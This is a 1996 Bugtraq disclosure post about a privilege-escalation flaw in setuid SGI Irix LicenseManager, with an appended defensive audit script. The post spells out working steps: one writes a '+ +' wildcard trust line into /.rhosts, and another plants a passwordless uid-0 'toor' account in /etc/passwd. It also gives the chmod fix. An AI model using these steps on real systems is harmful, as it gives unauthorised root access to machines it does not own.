Bugtraq mailing list archives
Irix: root exploit for LicenseManager
From: volobuev () t1 chem umn edu (Yuri Volobuev)
Date: Tue, 19 Nov 1996 13:30:19 -0600
Hi there,

For your convenience, a new, fast, reliable way to get root on your local SGI is given below. It works on Irix 5.3 and 6.x with license_eoe.sw.license_eoe installed, which I believe is default (I found it installed on several independent Irix installations). 5.2 doesn't seem to have it. This exploit was made possible by developers who make big, fat programs like LicenseManager suid.

Short background: LicenseManager is a GUI to the license subsystem. It allows one to install/remove/update FLEXlm and NET_LS licenses. Any regular user with access to an X screen can run it, and it's suid. It will allow anyone to install licenses, and will prompt for the root password if one wants to remove one. And that's about all the protection it has.

% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &

Install...
NetLS Node-locked
Vendor Name: whatever
Vendor ID: + +
Product name: whatever
License version: 1.000
License version:
Expiration date: 01-jan-0

(in license version field I put space)

Apply

License(s) succesfully installed

% cat /.rhosts
#:# "whatever" "whatever" "1.000" "Incomplete"
+ +

If your system has remote root logins disabled, replacing /.rhosts with /etc/passwd and + + with toor:0:0::/:/bin/sh will be helpful.

How to fix:

chmod -s /usr/etc/LicenseManager

Comments:

This whole thing makes me feel bad. There are genuine exploits, there are smart ones and lame ones. This one is superlame. Hacking a suid program like LicenseManager is like stealing a milk bottle from a newborn, while the baby's sleeping, parents are out of town and the babysitter's in the bathroom. It is extremely well known that suid programs are very dangerous. It doesn't take a lot of knowledge to figure that a suid program that big is vulnerable in a zillion ways (and it is, I've just shown one of many). It's just not suitable to be suid because it does no sanity checks whatsoever. So why is it suid? Somebody wanted to make the Irix GUI more user-friendly. Really, why not allow people to install licenses without bothering to su first? Alas, this is a clear case where security is sacrificed in favor of (very questionable) ease of use. With all due disrespect, even Microsoft doesn't do things like that so easily.

I notified SGI, but haven't heard back from them.

have fun,

yuri

---
This message reflects my personal opinion, not my employer's
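As an added audit example (not part of the original post or of any SGI tool), the POSIX shell script below checks a host for the three conditions the post describes: a setuid/setgid LicenseManager binary, wildcard "+" trust entries in an rhosts-style file, and extra uid-0 accounts in a passwd-style file. File paths are passed as arguments so the checks can be run against copies or test fixtures; the defaults assume the paths named in the post.

```shell
#!/bin/sh
# Audit helpers for the LicenseManager issue described in the post.
# Added example, not the original author's code. Default paths are the
# ones the post names; the functions take explicit paths so they can be
# exercised on copies.

# Return 0 if the file exists and carries the setuid or setgid bit.
is_privileged_bin() {
    f=$1
    [ -f "$f" ] || return 1
    [ -u "$f" ] || [ -g "$f" ]
}

# Print the number of wildcard trust entries ("+" as host or user field)
# in an rhosts-style file. Comment lines (leading #), such as the line
# LicenseManager wrote in the post, are ignored. Missing file counts as 0.
count_wildcard_trust() {
    f=$1
    [ -r "$f" ] || { echo 0; return 0; }
    grep -v '^[[:space:]]*#' "$f" | awk '
        $1 == "+" || $2 == "+" { n++ }
        END { print n + 0 }'
}

# Print the login names of uid-0 accounts other than root in a passwd-style
# file (the "toor" trick the post mentions). Missing file prints nothing.
extra_root_accounts() {
    f=$1
    [ -r "$f" ] || return 0
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$f"
}

# Run all three checks; return 1 if anything was found, 0 if clean.
audit() {
    bin=${1:-/usr/etc/LicenseManager}
    rhosts=${2:-/.rhosts}
    passwd=${3:-/etc/passwd}
    rc=0
    if is_privileged_bin "$bin"; then
        echo "WARN: $bin is setuid/setgid; fix: chmod -s $bin"
        rc=1
    fi
    n=$(count_wildcard_trust "$rhosts")
    if [ "$n" -gt 0 ]; then
        echo "WARN: $rhosts contains $n wildcard trust entries"
        rc=1
    fi
    extras=$(extra_root_accounts "$passwd")
    if [ -n "$extras" ]; then
        echo "WARN: extra uid-0 accounts in $passwd: $extras"
        rc=1
    fi
    return $rc
}
```

Running `audit` with no arguments checks the live system at the paths from the post; the non-zero exit status makes it usable from cron or a configuration check. The same three functions apply to any setuid program that honors an environment variable naming its output file, so the script is a reasonable template for auditing other suid binaries of this kind.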